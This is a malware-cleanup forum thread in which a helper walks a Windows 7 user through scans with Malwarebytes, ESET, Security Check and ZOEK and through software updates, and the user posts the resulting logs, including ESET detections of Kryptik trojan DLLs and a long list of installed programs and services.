Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ not found.

Starting removal of ActiveX control {DF780F87-FF2B-4DF8-92D0-73DB16A1543A}

C:\Windows\Downloaded Program Files\popcaploader.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}\ not found.

Starting removal of ActiveX control {E2883E8F-472F-4FB0-9522-AC9BF37916A7}

C:\Windows\Downloaded Program Files\gp.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2883E8F-472F-4FB0-9522-AC9BF37916A7}\ not found.

OTL by OldTimer - Version 3.2.69.0 log created on 10292014_121141

Thank you


OK, any outstanding issues?



Scan with Malwarebytes' Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.

  • Install the program and select update.
  • Once updated, click the Settings tab, in the left panel choose Detection & protection and tick Scan for rootkits.
  • Click the Scan tab, make sure Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.



Scan with ESET Online Scanner

This step can only be done using Internet Explorer, Google Chrome or Mozilla Firefox.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
Please visit ESET Online Scanner website.
There, click Run ESET Online Scanner.

If using Internet Explorer:

  • Accept the Terms of Use and click Start.
  • Allow the running of add-on.

If using Mozilla Firefox or Google Chrome:

  • Download esetsmartinstaller_enu.exe that you'll be given a link to.
  • Double click esetsmartinstaller_enu.exe.
  • Allow the Terms of Use and click Start.

To perform the scan:

  • Make sure that Enable detection of potentially unwanted applications is checked.
  • In the Advanced Settings dropdown menu:
    • Make sure that Remove found threats is unchecked.
    • Scan archives is checked.
    • Scan for potentially unsafe applications and Enable Anti-Stealth technology are checked.
    • Use custom proxy settings is unchecked.
  • Click Start
  • The program will begin to download its virus database. The speed may vary depending on your Internet connection.
  • When completed, the program will begin to scan. This may take several hours. Please, be patient.
  • Do not do anything on your machine as it may interrupt the scan.
  • When the scan is done, click Finish.
  • A logfile will be created at C:\Program Files (x86)\ESET\ESET Online Scanner. Open it using Notepad.

Please include this logfile in your next reply.
Don't forget to re-enable previously switched-off protection software!



Scan with Security Check

Please download Security Check by Screen317 and save it to your desktop.

  • Right-click on the Security Check icon and select Run as Administrator to start the tool.
  • Follow onscreen instructions inside the black box. This scan won't take long.
  • Soon a notepad document called checkup.txt will open automatically.

Please include the content of that document.


Ran the scans you requested. One thing I noticed: even though I only visited a couple of websites today (5), over 75 different sites I have never been to showed up in my history for today.

Here are the logs requested.

Malwarebytes

Malwarebytes Anti-Malware

www.malwarebytes.org

Scan Date: 10/29/2014

Scan Time: 12:52:01 PM

Logfile: MBAM log.txt

Administrator: Yes

Version: 2.00.3.1025

Malware Database: v2014.10.29.06

Rootkit Database: v2014.10.22.01

License: Premium

Malware Protection: Enabled

Malicious Website Protection: Enabled

Self-protection: Disabled

OS: Windows 7 Service Pack 1

CPU: x64

File System: NTFS

User: ADH

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 500945

Time Elapsed: 12 min, 19 sec

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled

Processes: 0

(No malicious items detected)

Modules: 0

(No malicious items detected)

Registry Keys: 0

(No malicious items detected)

Registry Values: 0

(No malicious items detected)

Registry Data: 0

(No malicious items detected)

Folders: 0

(No malicious items detected)

Files: 0

(No malicious items detected)

Physical Sectors: 0

(No malicious items detected)

(end)

ESET

ESETSmartInstaller@High as downloader log:

all ok

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# OnlineScanner.ocx=1.0.0.7623

# api_version=3.0.2

# EOSSerial=0110d3d997d11e4a8876317b4b115a50

# engine=20843

# end=finished

# remove_checked=false

# archives_checked=true

# unwanted_checked=true

# unsafe_checked=true

# antistealth_checked=true

# utc_time=2014-10-30 12:35:50

# local_time=2014-10-29 07:35:50 (-0600, Central Daylight Time)

# country="United States"

# lang=1033

# osver=6.1.7601 NT Service Pack 1

# compatibility_mode_1='Norton 360'

# compatibility_mode=3598 16777213 100 100 787053 165205446 0 0

# compatibility_mode_1=''

# compatibility_mode=5893 16776574 100 94 39991395 166172800 0 0

# scanned=271469

# found=4

# cleaned=0

# scan_time=6102

sh=3943F774A5C7882625F4712FDFB0748888BF73ED ft=1 fh=129698ed833729a2 vn="a variant of MSIL/Kryptik.AKY trojan" ac=I fn="C:\Users\ADH.Heathman-PC\AppData\LocalLow\grbfa.dll"

sh=941BC9D55FA81B95CA1ED92D35DEBB800D776D45 ft=1 fh=412e0aa5e7b09979 vn="a variant of MSIL/Kryptik.AKY trojan" ac=I fn="C:\Users\ADH.Heathman-PC\AppData\LocalLow\srayb.dll"

sh=D39B163A9D654306C53C4C7F33A57CFB19F97CEE ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="C:\Users\Heathman\AppData\Local\Downloaded Installations\{22FA2064-F3D1-4F3E-8664-BA980ABA3128}\PCmover Professional.msi"

sh=D39B163A9D654306C53C4C7F33A57CFB19F97CEE ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="C:\Windows\Installer\1409584a.msi"

Security check

Results of screen317's Security Check version 0.99.89

Windows 7 Service Pack 1 x64 (UAC is enabled)

Internet Explorer 10 Out of date!

``````````````Antivirus/Firewall Check:``````````````

Windows Firewall Enabled!

Norton 360 Premier Edition

WMI entry may not exist for antivirus; attempting automatic update.

`````````Anti-malware/Other Utilities Check:`````````

Java 6 Update 25

Java version out of Date!

Adobe Flash Player 15.0.0.152

Adobe Reader 10.1.12 Adobe Reader out of Date!

Google Chrome 38.0.2125.104

Google Chrome 38.0.2125.111

````````Process Check: objlist.exe by Laurent````````

Norton ccSvcHst.exe

Malwarebytes Anti-Malware mbamservice.exe

Malwarebytes Anti-Malware mbam.exe

Malwarebytes Anti-Malware mbamscheduler.exe

`````````````````System Health check`````````````````

Total Fragmentation on Drive C: 7%

````````````````````End of Log``````````````````````


Also get the following popup when I log into one of my user accounts. I'm not sure if due to infection.

RegSvr32

The module “C:\Users\Heathman\AppData\Local\AppleComputer\goopdate_unsigned.dll failed to load.

Make sure the binary is stored at the specified path or debug it to check for problems with the binary or dependent .DLL files.

The specified module could not be found.


Update outdated software

Staying always updated is crucial, not only for your operating system, but also for any third-party installed software.

Your logs clearly indicate that some of your software needs updating.

Updating Internet Explorer manually

IE is an integrated part of Windows core. Leaving it without updates is a great risk for your data security, even if you don't use it!

  • Visit THIS website.
  • You will find IE 11 there to be downloaded and installed.

Updating Java manually

  • Click the Start button
  • Click Control Panel
  • Double click Java - Looks like a coffee cup. You may have to switch to Classical View to see it.
  • Click the Update tab
  • Click Update Now
  • Allow any updates to be downloaded and installed.
  • If prompted (during the installation) to also install ASK toolbar, leave this unchecked - Ask does not have a good reputation.
  • From Control Panel, please also remove any older versions of Java - do not leave them installed!

Updating Adobe manually

  • Visit Adobe website.
  • You will see a download option there for the newest Adobe Acrobat version.
  • In the center part you will be prompted to install McAfee Security Scan Plus or Google Chrome (depending on your locale) as a free program. This is foistware. Remember to leave the box for it UNCHECKED.
  • Click on Install, save the file to a convenient location, double-click it and follow the prompts.

Please remember to always keep your software updated. It's crucial, as bugs are still being discovered and patched by the vendors.

Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on the ZOEK icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console appears; it may take a minute or two.
  • In the main box please paste in the following script:

    createsrpoint;process;services-list;systemspecs;startupall;skipfix-iedefaults;firefoxlook;chromelook;filesrcm;installedprogs;
  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Please include its content in your next reply.

Don't forget to re-enable your switched-off protection software!


Good morning, I updated the software as requested and ran the scan. Had a couple of malicious site blocks this morning referencing the explore.exe file as well as large history of websites visited.

Here is the log you requested. Thank you

Zoek.exe v5.0.0.0 Updated 29-10-2014

Tool run by ADH on Thu 10/30/2014 at 7:09:05.22.

Microsoft Windows 7 Home Premium 6.1.7601 Service Pack 1 x64

Running in: Normal Mode Internet Access Detected

Launched: C:\Users\ADH.Heathman-PC\Downloads\zoek.exe [scan all users] [script inserted]

==== System Restore Info ======================

10/30/2014 7:10:29 AM Zoek.exe System Restore Point Created Succesfully.

==== Installed Programs ======================

Adobe AIR

Adobe Flash Player 15 ActiveX

Adobe Flash Player 15 Plugin

Adobe Reader XI (11.0.09)

Amazing Adventures The Forgotten Dynasty

Amazon Links

Amazon MP3 Downloader 1.0.17

Apple Application Support

Apple Mobile Device Support

Apple Software Update

Bejeweled 3

Big City Adventure San Francisco

Big City Adventure Sydney

Bonjour

Castle - Never Judge a Book by Its Cover

ContentHD

Contents

Corel Digital Studio SE

D3DX10

Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition

DeviceIO

DFPro

Escape The Emerald Star

Escape Whisper Valley

FATE - The Traitor Soul

Google Chrome

Google Earth Plug-in

Google Toolbar for Internet Explorer

Google Update Helper

Hoyle Card Games Classic

Hoyle Casino Classic

ICA

Intel PROSet Wireless

Intel® Management Engine Components

Intel® Processor Graphics

Intel® PROSet/Wireless WiFi Software

Intel® Rapid Storage Technology

Intel® WiDi

Intel® Wireless Display

IPM_OEM

ISCOM

iTunes

Java 8 Update 25

Java Auto Updater

Jewel Quest Mysteries Curse of the Emerald Tear

Jewel Quest Mysteries The Seventh Gate

Jewel Quest Mysteries Trail of the Midnight Heart

JMicron Flash Media Controller Driver

Junk Mail filter update

Label@Once 1.0

Letters from Nowhere 2

Malwarebytes Anti-Malware version 2.0.3.1025

Mesh Runtime

Microsoft .NET Framework 4.5.1

Microsoft Application Error Reporting

Microsoft Office Access MUI (English) 2010

Microsoft Office Access Setup Metadata MUI (English) 2010

Microsoft Office Excel MUI (English) 2010

Microsoft Office Office 64-bit Components 2010

Microsoft Office OneNote MUI (English) 2010

Microsoft Office Outlook MUI (English) 2010

Microsoft Office PowerPoint MUI (English) 2010

Microsoft Office Professional 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (Spanish) 2010

Microsoft Office Proofing (English) 2010

Microsoft Office Publisher MUI (English) 2010

Microsoft Office Shared 64-bit MUI (English) 2010

Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010

Microsoft Office Shared MUI (English) 2010

Microsoft Office Shared Setup Metadata MUI (English) 2010

Microsoft Office Single Image 2010

Microsoft Office Word MUI (English) 2010

Microsoft Silverlight

Microsoft SQL Server 2005 Compact Edition [ENU]

Microsoft Visual C++ 2005 Redistributable

Microsoft Visual C++ 2005 Redistributable (x64)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319

MLE

More Games - WildTangent

MotoCast

Motorola Device Manager

Motorola Device Software Update

MOTOROLA MEDIA LINK

Motorola Mobile Drivers Installation 6.3.0

MSVCRT

MSVCRT_amd64

MSXML 4.0 SP2 (KB954430)

MSXML 4.0 SP2 (KB973688)

MSXML 4.0 SP3 Parser

MSXML 4.0 SP3 Parser (KB2721691)

MSXML 4.0 SP3 Parser (KB2758694)

Mystery P.I. - Stolen in San Francisco

Mystery P.I. - The New York Fortune

National Geographic Collector's Pack

Norton 360

Norton PC Checkup

NVIDIA 3D Vision Controller Driver

NVIDIA 3D Vision Controller Driver 296.10

NVIDIA Control Panel 296.10

NVIDIA Graphics Driver 296.10

NVIDIA Install Application

NVIDIA Optimus 1.7.11

NVIDIA PhysX

NVIDIA PhysX System Software 9.12.0213

NVIDIA Update Components

PCmover Professional

Penguins

Plants vs. Zombies - Game of the Year

PlayReady PC Runtime amd64

PlayReady PC Runtime x86

Polar Bowler

PureHD

Realtek Ethernet Controller Driver

Realtek High Definition Audio Driver

Renesas Electronics USB 3.0 Host Controller Driver

RollerCoaster Tycoon 3: Platinum

Samsung CLP-310 Series

Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)

Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)

Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)

Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)

Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)

Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)

Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)

Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition

Security Update for Microsoft Office 2010 (KB2881071) 32-Bit Edition

Security Update for Microsoft Word 2010 (KB2883013) 32-Bit Edition

Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition

Setup

Share

Share64

Skype Launcher

Synaptics Pointing Device Driver

Tales of Lagoona

TomTom HOME

TomTom HOME Visual Studio Merge Modules

Toshiba App Place

TOSHIBA Application Installer

TOSHIBA Assist

TOSHIBA Blu-ray Disc Player

Toshiba Book Place

TOSHIBA Bulletin Board

TOSHIBA Disc Creator

TOSHIBA eco Utility

TOSHIBA Face Recognition

TOSHIBA Flash Cards Support Utility

TOSHIBA Hardware Setup

TOSHIBA HDD Protection

TOSHIBA HDD/SSD Alert

Toshiba Laptop Checkup

TOSHIBA Media Controller

TOSHIBA Media Controller Plug-in

Toshiba Online Backup

TOSHIBA PC Health Monitor

TOSHIBA Quality Application

TOSHIBA Recovery Media Creator

TOSHIBA ReelTime

TOSHIBA Resolution+ Plug-in for Windows Media Player

TOSHIBA Service Station

TOSHIBA Sleep Utility

TOSHIBA Supervisor Password

TOSHIBA Value Added Package

TOSHIBA Web Camera Application

TOSHIBA Wireless Display Monitor

TOSHIBARegistration

TurboTax 2009

TurboTax 2009 WinPerFedFormset

TurboTax 2009 WinPerReleaseEngine

TurboTax 2009 WinPerTaxSupport

TurboTax 2009 wmoiper

TurboTax 2009 wrapper

TurboTax 2010

TurboTax 2010 WinPerFedFormset

TurboTax 2010 WinPerReleaseEngine

TurboTax 2010 WinPerTaxSupport

TurboTax 2010 wmoiper

TurboTax 2010 wrapper

TurboTax 2011

TurboTax 2011 WinPerFedFormset

TurboTax 2011 WinPerReleaseEngine

TurboTax 2011 WinPerTaxSupport

TurboTax 2011 wmoiper

TurboTax 2011 wrapper

TurboTax 2012

TurboTax 2012 WinPerFedFormset

TurboTax 2012 WinPerReleaseEngine

TurboTax 2012 WinPerTaxSupport

TurboTax 2012 wmoiper

TurboTax 2012 wrapper

TurboTax 2013

TurboTax 2013 WinPerFedFormset

TurboTax 2013 WinPerReleaseEngine

TurboTax 2013 WinPerTaxSupport

TurboTax 2013 wmoiper

TurboTax 2013 wrapper

Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition

Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition

Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition

Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition

Update for Microsoft Office 2010 (KB2494150)

Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition

Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition

Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition

Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition

Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition

Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition

Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition

Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition

Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition

Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition

Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition

Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition

Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition

Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition

Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition

Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition

Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition

Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition

Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition

Update Installer for WildTangent Games App

Utility Common Driver

Vacation Quest - Australia

Vacation Quest - The Hawaiian Islands

VIO

WildTangent Games

WildTangent Games App (Toshiba Games)

Windows Live Communications Platform

Windows Live Essentials

Windows Live ID Sign-in Assistant

Windows Live Installer

Windows Live Language Selector

Windows Live Mail

Windows Live Mesh

Windows Live Mesh ActiveX Control for Remote Connections

Windows Live Messenger

Windows Live MIME IFilter

Windows Live Movie Maker

Windows Live Photo Common

Windows Live Photo Gallery

Windows Live PIMT Platform

Windows Live Remote Client

Windows Live Remote Client Resources

Windows Live Remote Service

Windows Live Remote Service Resources

Windows Live SOXE

Windows Live SOXE Definitions

Windows Live UX Platform

Windows Live UX Platform Language Pack

Windows Live Writer

Windows Live Writer Resources

Zuma's Revenge

==== Running Processes ======================

C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe

C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe

C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe

C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe

c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe

C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe

C:\Windows\Samsung\PanelMgr\SSMMgr.exe

C:\Program Files (x86)\iTunes\iTunesHelper.exe

C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe

C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe

C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe

C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\ADH.Heathman-PC\Downloads\zoek.exe

C:\windows\SysWOW64\cmd.exe

C:\windows\SysWOW64\cmd.exe

C:\windows\SysWOW64\cmd.exe

==== Services (whitelist) ======================

Powered by E Dev

R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"

R2 - [Apple Mobile Device] - Apple Mobile Device - "C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe"

R2 - [bonjour Service] - Bonjour Service - "C:\Program Files\Bonjour\mDNSResponder.exe"

R2 - [DeviceMonitorService] - DeviceMonitorService - "C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe"

R2 - [EvtEng] - Intel® PROSet/Wireless Event Log - C:\Program Files\Intel\WiFi\bin\EvtEng.exe

R2 - [intuitUpdateService] - Intuit Update Service - "C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe"

R2 - [intuitUpdateServiceV4] - Intuit Update Service v4 - "C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe"

R2 - [LMS] - Intel® Management and Security Application Local Management Service - C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

R2 - [MBAMScheduler] - MBAMScheduler - "C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe"

R2 - [MBAMService] - MBAMService - "C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe"

R2 - [Motorola Device Manager] - Motorola Device Manager Service - C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

R2 - [msiserver] - Windows Installer - C:\windows\system32\msiexec.exe /V

R2 - [N360] - Norton 360 - "C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe" /s "N360" /m "C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\diMaster.dll" /prefetch:1

R2 - [Norton PC Checkup Application Launcher] - Norton PC Checkup Application Launcher - C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe /s

R2 - [NVSvc] - NVIDIA Display Driver Service - C:\windows\system32\nvvsvc.exe

R2 - [nvUpdatusService] - NVIDIA Update Service Daemon - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

R2 - [PCCUJobMgr] - Common Client Job Manager Service - "C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe" /s "PCCUJobMgr" /m "C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\diMaster.dll" /prefetch:1

R2 - [PSI_SVC_2] - Protexis Licensing V2 - "c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe"

R2 - [RegSrvc] - Intel® PROSet/Wireless Registry Service - C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

R2 - [Thpsrv] - TOSHIBA HDD Protection - C:\windows\system32\ThpSrv.exe

R2 - [TODDSrv] - TOSHIBA Optical Disc Drive Service - C:\windows\system32\TODDSrv.exe

R2 - [TosCoSrv] - TOSHIBA Power Saver - "C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe"

R2 - [TOSHIBA eco Utility Service] - TOSHIBA eco Utility Service - "C:\Program Files\TOSHIBA\TECO\TecoService.exe"

R2 - [uDSS] - UDSS - "c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe"

R2 - [uNS] - Intel® Management and Security Application User Notification Service - "C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe"

R2 - [wlidsvc] - Windows Live ID Sign-in Assistant - "C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"

R2 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

R3 - [iPod Service] - iPod Service - "C:\Program Files\iPod\bin\iPodService.exe"

R3 - [TMachInfo] - TMachInfo - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe

R3 - [TOSHIBA HDD SSD Alert Service] - TOSHIBA HDD SSD Alert Service - "C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe"

R3 - [TPCHSrv] - TPCH Service - "C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe"

R3 - [VSS] - Volume Shadow Copy - C:\windows\system32\vssvc.exe

S2 - [clr_optimization_v4.0.30319_32] - Microsoft .NET Framework NGEN v4.0.30319_X86 - C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

S2 - [clr_optimization_v4.0.30319_64] - Microsoft .NET Framework NGEN v4.0.30319_X64 - C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

S2 - [sppsvc] - Software Protection - C:\windows\system32\sppsvc.exe

S2 - [WSearch] - Windows Search - C:\windows\system32\SearchIndexer.exe /Embedding

S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

S3 - [ALG] - Application Layer Gateway Service - C:\windows\System32\alg.exe

S3 - [aspnet_state] - ASP.NET State Service - C:\windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

S3 - [COMSysApp] - COM+ System Application - C:\windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

S3 - [ehRecvr] - Windows Media Center Receiver Service - C:\windows\ehome\ehRecvr.exe

S3 - [ehSched] - Windows Media Center Scheduler Service - C:\windows\ehome\ehsched.exe

S3 - [Fax] - Fax - C:\windows\system32\fxssvc.exe

S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

S3 - [GamesAppService] - GamesAppService - "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe"

S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc

S3 - [gusvc] - Google Software Updater - "C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe"

S3 - [iEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\windows\system32\IEEtwCollector.exe /V

S3 - [MSDTC] - Distributed Transaction Coordinator - C:\windows\System32\msdtc.exe

S3 - [MyWiFiDHCPDNS] - Wireless PAN DHCP Server - C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe

S3 - [ose] - Office Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"

S3 - [osppsvc] - Office Software Protection Platform - "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

S3 - [PerfHost] - Performance Counter DLL Host - C:\windows\SysWow64\perfhost.exe

S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\windows\system32\locator.exe

S3 - [sNMPTRAP] - SNMP Trap - C:\windows\System32\snmptrap.exe

S3 - [TrustedInstaller] - Windows Modules Installer - C:\windows\servicing\TrustedInstaller.exe

S3 - [vds] - Virtual Disk - C:\windows\System32\vds.exe

S3 - [WatAdminSvc] - Windows Activation Technologies Service - C:\windows\system32\Wat\WatAdminSvc.exe

S3 - [wbengine] - Block Level Backup Engine Service - "C:\windows\system32\wbengine.exe"

S3 - [wmiApSrv] - WMI Performance Adapter - C:\windows\system32\wbem\WmiApSrv.exe

S4 - [clr_optimization_v2.0.50727_32] - Microsoft .NET Framework NGEN v2.0.50727_X86 - C:\windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

S4 - [clr_optimization_v2.0.50727_64] - Microsoft .NET Framework NGEN v2.0.50727_X64 - C:\windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

S4 - [wlcrasvc] - Windows Live Mesh remote connections service - "C:\Program Files\Windows Live\Mesh\wlcrasvc.exe"

==== System Specs ======================

Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)

Memory (RAM): 8099 MB

CPU Info: Intel® Core i5-2450M CPU @ 2.50GHz

CPU Speed: 2519.7 MHz

Sound Card: Speakers (Realtek High Definiti |

